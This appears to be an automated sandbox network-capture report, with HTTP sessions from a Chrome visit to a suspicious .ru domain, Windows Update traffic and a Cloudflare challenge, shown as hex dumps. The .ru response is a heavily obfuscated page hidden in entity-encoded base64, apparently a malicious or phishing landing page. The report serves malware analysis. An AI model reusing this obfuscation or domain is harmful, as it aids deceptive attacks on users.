                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:12 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700870cd194346-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:12 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 08 00 00 00 3b 08 02 00 00 00 c9 83 5c df 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDR;\IDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              22192.168.2.449766172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:13 UTC683OUTGET / HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:14 UTC745INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:14 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Br0RcjVsLOMk%2Bcr79FkE7PvbHJPe%2BSRfweV%2B9wz195Q%2FycThx86TwlPLz06i7JxmSVGrpJFJ%2FK1l0bFfJQR6TQeet1c4BXWotG4R7Y2YsOixqAqtv7NBwIenNCEtOUmVqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470087449df0fab-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:14 UTC624INData Raw: 36 38 36 34 0d 0a 3c 66 50 45 66 45 76 79 71 70 53 4f 65 20 6d 50 4c 6f 48 4c 56 75 57 55 59 62 48 44 45 3d 22 26 23 38 30 3b 26 23 36 37 3b 26 23 37 30 3b 26 23 36 39 3b 26 23 38 34 3b 26 23 34 38 3b 26 23 37 38 3b 26 23 38 35 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 36 36 3b 26 23 37 30 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 31 30 33 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 31 32 32 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 35 32 3b 26 23 31 30 35 3b 26 23 38 30 3b 26 23 31 30
                                                                                                                                                              Data Ascii: 6864<fPEfEvyqpSOe mPLoHLVuWUYbHDE="&#80;&#67;&#70;&#69;&#84;&#48;&#78;&#85;&#87;&#86;&#66;&#70;&#73;&#71;&#104;&#48;&#98;&#87;&#119;&#43;&#80;&#71;&#104;&#48;&#98;&#87;&#119;&#103;&#98;&#71;&#70;&#117;&#90;&#122;&#48;&#105;&#90;&#87;&#52;&#105;&#80;&#10
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 31 3b 26 23 39 39 3b 26 23 35 30 3b 26 23 38 36 3b 26 23 34 38 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 37 34 3b 26 23 38 36 3b 26 23 38 36 3b 26 23 36 39 3b 26 23 38 39 3b 26 23 31 31 36 3b 26 23 37 39 3b 26 23 36 37 3b 26 23 37 33 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 36 39 3b 26 23 31 30 33 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 37 30 3b 26 23 31 31 36 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 31 32 31 3b 26 23 37 33 3b 26 23 31 30 33 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 35 37 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 31 31 37 3b
                                                                                                                                                              Data Ascii: 1;&#99;&#50;&#86;&#48;&#80;&#83;&#74;&#86;&#86;&#69;&#89;&#116;&#79;&#67;&#73;&#43;&#80;&#71;&#49;&#108;&#100;&#71;&#69;&#103;&#98;&#109;&#70;&#116;&#90;&#84;&#48;&#105;&#98;&#71;&#70;&#117;&#90;&#121;&#73;&#103;&#89;&#50;&#57;&#117;&#100;&#71;&#86;&#117;
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 26 23 39 37 3b 26 23 31 32 31 3b 26 23 36 36 3b 26 23 31 32 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 35 37 3b 26 23 37 33 3b 26 23 31 31 30 3b 26 23 37 38 3b 26 23 34 38 3b 26 23 31 30 31 3b 26 23 38 37 3b 26 23 31 32 30 3b 26 23 31 30 38 3b 26 23 39 39 3b 26 23 35 30 3b 26 23 31 30 34 3b 26 23 31 30 38 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 38 31 3b 26 23 31 30 35 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 31 32 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 38 39 3b 26 23 35 37 3b 26 23 37 33 3b 26 23 31 30 39 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 31 30 30 3b 26 23 37 32 3b 26 23 36 36 3b 26 23 31 32 32 3b 26 23 37 39 3b 26 23 31 30 35 3b 26 23 35 36 3b 26 23 31 31 38 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 38 32 3b 26 23
                                                                                                                                                              Data Ascii: &#97;&#121;&#66;&#121;&#90;&#87;&#119;&#57;&#73;&#110;&#78;&#48;&#101;&#87;&#120;&#108;&#99;&#50;&#104;&#108;&#90;&#88;&#81;&#105;&#73;&#71;&#104;&#121;&#90;&#87;&#89;&#57;&#73;&#109;&#104;&#48;&#100;&#72;&#66;&#122;&#79;&#105;&#56;&#118;&#89;&#50;&#82;&#
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 23 36 37 3b 26 23 36 35 3b 26 23 31 30 39 3b 26 23 37 34 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 31 31 37 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 39 30 3b 26 23 31 31 32 3b 26 23 39 30 3b 26 23 35 30 3b 26 23 37 30 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 37 33 3b 26 23 31 31 37 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 30 38 3b 26 23 31 31 36 3b 26 23 39 30 3b 26 23 38 36 3b 26 23 38 32 3b 26 23 35 33 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 31 32 32 3b 26 23 37 36 3b 26 23 31 30 39 3b 26 23 31 32 30 3b 26 23 31 30 38 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 34 38 3b 26 23 39 37 3b 26 23 36 37 3b 26 23 36 35 3b 26 23 31 31 34 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 35 33 3b 26 23 31 30 34 3b 26 23 31 30 30 3b
                                                                                                                                                              Data Ascii: #67;&#65;&#109;&#74;&#105;&#66;&#117;&#89;&#88;&#90;&#112;&#90;&#50;&#70;&#48;&#98;&#51;&#73;&#117;&#98;&#87;&#108;&#116;&#90;&#86;&#82;&#53;&#99;&#71;&#86;&#122;&#76;&#109;&#120;&#108;&#98;&#109;&#100;&#48;&#97;&#67;&#65;&#114;&#73;&#71;&#53;&#104;&#100;
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 23 35 30 3b 26 23 37 38 3b 26 23 34 39 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 36 39 3b 26 23 38 36 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 39 38 3b 26 23 31 31 30 3b 26 23 38 31 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 35 30 3b 26 23 38 36 3b 26 23 34 38 3b 26 23 38 31 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 34 38 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 30 38 3b 26 23 37 35 3b 26 23 36 37 3b 26 23 37 34 3b 26 23 35 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 37 34 3b 26 23 31 30 37 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 35 30 3b 26 23 39 30 3b 26 23
                                                                                                                                                              Data Ascii: #50;&#78;&#49;&#98;&#87;&#86;&#117;&#100;&#69;&#86;&#115;&#90;&#87;&#49;&#108;&#98;&#110;&#81;&#117;&#90;&#50;&#86;&#48;&#81;&#88;&#82;&#48;&#99;&#109;&#108;&#105;&#100;&#88;&#82;&#108;&#75;&#67;&#74;&#51;&#90;&#87;&#74;&#107;&#99;&#109;&#108;&#50;&#90;&#
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 30 3b 26 23 38 37 3b 26 23 38 32 3b 26 23 31 30 38 3b 26 23 39 39 3b 26 23 31 32 31 3b 26 23 31 30 33 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 35 30 3b 26 23 38 36 3b 26 23 31 30 35 3b 26 23 39 30 3b 26 23 37 32 3b 26 23 37 34 3b 26 23 31 31 32 3b 26 23 31 30 30 3b 26 23 31 30 39 3b 26 23 38 36 3b 26 23 31 32 31 3b 26 23 37 33 3b 26 23 31 30 35 3b 26 23 31 30 37 3b 26 23 31 31 32 3b 26 23 37 33 3b 26 23 37 32 3b 26 23 31 32 30 3b 26 23 35 36 3b 26 23 37 33 3b 26 23 36 37 3b 26 23 37 34 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 30 36 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 31 31 38 3b 26 23 39 38 3b 26 23 31 30 35 3b 26 23 37 33 3b 26 23 31 30 33 3b 26 23 38 30 3b 26 23 38 34 3b 26 23 34 38 3b 26
                                                                                                                                                              Data Ascii: 0;&#87;&#82;&#108;&#99;&#121;&#103;&#105;&#100;&#50;&#86;&#105;&#90;&#72;&#74;&#112;&#100;&#109;&#86;&#121;&#73;&#105;&#107;&#112;&#73;&#72;&#120;&#56;&#73;&#67;&#74;&#109;&#100;&#87;&#53;&#106;&#100;&#71;&#108;&#118;&#98;&#105;&#73;&#103;&#80;&#84;&#48;&
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 33 3b 26 23 31 30 37 3b 26 23 39 38 3b 26 23 35 30 3b 26 23 37 38 3b 26 23 34 39 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 36 39 3b 26 23 38 36 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 39 38 3b 26 23 31 31 30 3b 26 23 38 31 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 35 30 3b 26 23 38 36 3b 26 23 34 38 3b 26 23 38 31 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 34 38 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 30 38 3b 26 23 37 35 3b 26 23 36 37 3b 26 23 37 34 3b 26 23 35 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 37 34 3b 26 23 31 30 37 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30
                                                                                                                                                              Data Ascii: 3;&#107;&#98;&#50;&#78;&#49;&#98;&#87;&#86;&#117;&#100;&#69;&#86;&#115;&#90;&#87;&#49;&#108;&#98;&#110;&#81;&#117;&#90;&#50;&#86;&#48;&#81;&#88;&#82;&#48;&#99;&#109;&#108;&#105;&#100;&#88;&#82;&#108;&#75;&#67;&#74;&#51;&#90;&#87;&#74;&#107;&#99;&#109;&#10
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 30 38 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 35 32 3b 26 23 35 36 3b 26 23 37 36 3b 26 23 35 30 3b 26 23 31 30 34 3b 26 23 31 30 38 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 38 31 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 37 34 3b 26 23 31 31 38 3b 26 23 39 30 3b 26 23 37 32 3b 26 23 31 30 37 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 38 32 3b 26 23 31 31 32 3b 26 23 31 30 30 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 31 30 36 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 31 32 32 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 35 37 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 31 30 39 3b 26
                                                                                                                                                              Data Ascii: 08;&#115;&#90;&#84;&#52;&#56;&#76;&#50;&#104;&#108;&#89;&#87;&#81;&#43;&#80;&#71;&#74;&#118;&#90;&#72;&#107;&#43;&#80;&#71;&#82;&#112;&#100;&#105;&#66;&#106;&#98;&#71;&#70;&#122;&#99;&#122;&#48;&#105;&#89;&#50;&#57;&#117;&#100;&#71;&#70;&#112;&#98;&#109;&
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 36 3b 26 23 37 36 3b 26 23 35 31 3b 26 23 37 38 3b 26 23 31 31 39 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 35 32 3b 26 23 34 33 3b 26 23 31 30 30 3b 26 23 38 38 3b 26 23 37 37 3b 26 23 35 36 3b 26 23 39 39 3b 26 23 35 31 3b 26 23 36 36 3b 26 23 31 30 34 3b 26 23 39 38 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 31 30 36 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 31 32 32 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 39 37 3b 26 23 38 38 3b 26 23 31 31 32 3b 26 23 36 38 3b 26 23 38 32 3b 26 23 31 30 37 3b 26 23 38 36 3b 26 23 38 34 3b 26 23 39 38 3b 26 23 34 38 3b 26 23 31 30 34 3b 26 23 37 38 3b 26 23 31 30 31 3b 26 23 36 39 3b 26 23 37 34 3b 26 23 31 32 30 3b 26 23 39 39 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 34 38 3b
                                                                                                                                                              Data Ascii: 6;&#76;&#51;&#78;&#119;&#89;&#87;&#52;&#43;&#100;&#88;&#77;&#56;&#99;&#51;&#66;&#104;&#98;&#105;&#66;&#106;&#98;&#71;&#70;&#122;&#99;&#122;&#48;&#105;&#97;&#88;&#112;&#68;&#82;&#107;&#86;&#84;&#98;&#48;&#104;&#78;&#101;&#69;&#74;&#120;&#99;&#88;&#82;&#48;
                                                                                                                                                              2024-01-17 16:39:14 UTC1369INData Raw: 3b 26 23 37 37 3b 26 23 31 30 36 3b 26 23 37 33 3b 26 23 35 33 3b 26 23 37 38 3b 26 23 36 38 3b 26 23 37 33 3b 26 23 35 36 3b 26 23 37 36 3b 26 23 35 31 3b 26 23 37 38 3b 26 23 31 31 39 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 35 32 3b 26 23 34 33 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 31 32 30 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 37 38 3b 26 23 31 31 35 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 37 34 3b 26 23 31 31 32 3b 26 23 31 30 31 3b 26 23 31 30 37 3b 26 23 37 38 3b 26 23 37 31 3b 26 23 38 32 3b 26 23 38 36 3b 26 23 37 38 3b 26 23 31 31 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 34 39 3b 26 23 35 32 3b 26 23 38
                                                                                                                                                              Data Ascii: ;&#77;&#106;&#73;&#53;&#78;&#68;&#73;&#56;&#76;&#51;&#78;&#119;&#89;&#87;&#52;&#43;&#90;&#84;&#120;&#122;&#99;&#71;&#70;&#117;&#73;&#71;&#78;&#115;&#89;&#88;&#78;&#122;&#80;&#83;&#74;&#112;&#101;&#107;&#78;&#71;&#82;&#86;&#78;&#118;&#83;&#69;&#49;&#52;&#8


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              23192.168.2.44976752.165.165.26443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:14 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dGeXFcO742e+8lY&MD=v78ASCbe HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                              2024-01-17 16:39:14 UTC560INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                              MS-CorrelationId: 4cadb5a7-a0f9-4c1b-a293-722dc9e59799
                                                                                                                                                              MS-RequestId: 4fe60d0c-b24e-4de8-9181-5d57ea454c7d
                                                                                                                                                              MS-CV: UwvyOTxzokmTqF9x.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:13 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 24490
                                                                                                                                                              2024-01-17 16:39:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                              2024-01-17 16:39:14 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              24192.168.2.449770104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:14 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 28260
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              CF-Challenge: 20178212f2891c9
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:14 UTC16384OUTData Raw: 76 5f 38 34 37 30 30 38 33 62 62 61 36 61 34 32 30 31 3d 45 4f 32 64 42 34 4c 48 36 62 66 56 4f 65 68 4c 31 4c 63 56 74 64 52 71 71 56 37 64 75 42 24 58 37 56 4d 56 48 70 64 63 77 56 59 58 56 65 64 69 4f 39 56 2d 68 56 30 24 69 6f 43 4c 50 56 69 57 24 68 6b 56 53 64 58 6e 57 32 56 65 32 4c 67 56 30 35 4a 2d 73 77 39 68 77 68 56 65 24 4c 25 32 62 30 56 58 33 39 24 56 4c 49 35 35 43 56 34 43 74 4c 47 45 62 77 64 4c 57 69 64 58 68 56 7a 57 4a 41 71 78 79 79 55 54 64 4c 6f 68 56 4c 6f 4c 78 34 64 56 50 56 56 37 33 56 68 6f 43 38 74 68 56 52 7a 74 24 64 4c 77 39 6b 77 71 66 36 7a 68 24 71 57 65 56 37 43 68 56 66 73 71 66 63 33 6b 56 65 70 68 4f 4d 39 53 4c 66 6f 77 54 4e 57 69 4c 5a 52 66 6b 64 54 4e 56 70 70 4e 4e 24 38 2d 2d 76 36 2d 48 4b 77 69 4b 79 54 2d
                                                                                                                                                              Data Ascii: v_8470083bba6a4201=EO2dB4LH6bfVOehL1LcVtdRqqV7duB$X7VMVHpdcwVYXVediO9V-hV0$ioCLPViW$hkVSdXnW2Ve2LgV05J-sw9hwhVe$L%2b0VX39$VLI55CV4CtLGEbwdLWidXhVzWJAqxyyUTdLohVLoLx4dVPVV73VhoC8thVRzt$dLw9kwqf6zh$qWeV7ChVfsqfc3kVephOM9SLfowTNWiLZRfkdTNVppNN$8--v6-HKwiKyT-
                                                                                                                                                              2024-01-17 16:39:14 UTC11876OUTData Raw: 54 68 2b 56 4c 54 6a 54 56 6a 51 59 4b 47 36 45 24 62 69 68 39 34 36 4c 77 56 73 56 4e 66 34 2d 56 4d 64 52 6a 71 2b 56 75 43 77 32 34 35 71 31 68 65 24 34 77 56 2b 34 52 24 34 6b 56 73 56 56 6f 2b 6d 75 75 43 58 56 4c 49 56 24 39 45 41 4f 33 6b 35 24 45 33 78 63 56 79 64 55 32 34 43 56 32 56 68 36 34 54 56 58 64 4c 76 56 66 56 66 4f 52 36 34 2d 56 33 64 58 66 56 43 56 79 56 65 66 4c 37 56 6e 50 64 76 32 24 56 7a 66 58 30 65 32 39 32 38 64 30 4c 54 56 2b 24 4e 39 34 63 64 74 56 55 39 4c 46 51 7a 66 55 56 4c 4b 51 35 56 4c 2d 34 4f 56 54 32 34 36 65 69 56 57 75 34 36 4c 4d 56 2d 56 69 4e 56 24 4c 5a 56 63 56 58 53 64 32 56 68 32 34 4c 57 77 64 63 32 56 4e 56 55 56 77 36 65 54 56 43 64 65 36 56 66 56 69 56 75 66 34 43 56 45 56 46 58 56 24 56 44 77 69 39 65
                                                                                                                                                              Data Ascii: Th+VLTjTVjQYKG6E$bih946LwVsVNf4-VMdRjq+VuCw245q1he$4wV+4R$4kVsVVo+muuCXVLIV$9EAO3k5$E3xcVydU24CV2Vh64TVXdLvVfVfOR64-V3dXfVCVyVefL7VnPdv2$VzfX0e2928d0LTV+$N94cdtVU9LFQzfUVLKQ5VL-4OVT246eiVWu46LMV-ViNV$LZVcVXSd2Vh24LWwdc2VNVUVw6eTVCde6VfViVuf4CVEVFXV$VDwi9e
                                                                                                                                                              2024-01-17 16:39:15 UTC327INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:15 GMT
                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cf-chl-gen: AUFE0ubKOE0Lg2Dk+o1RCOsyjk993POtjHHPkpvr3hVUl5pbgFLNZ3bN3tx6HbWh$Eu05yvAMcOE43CQw81M3pw==
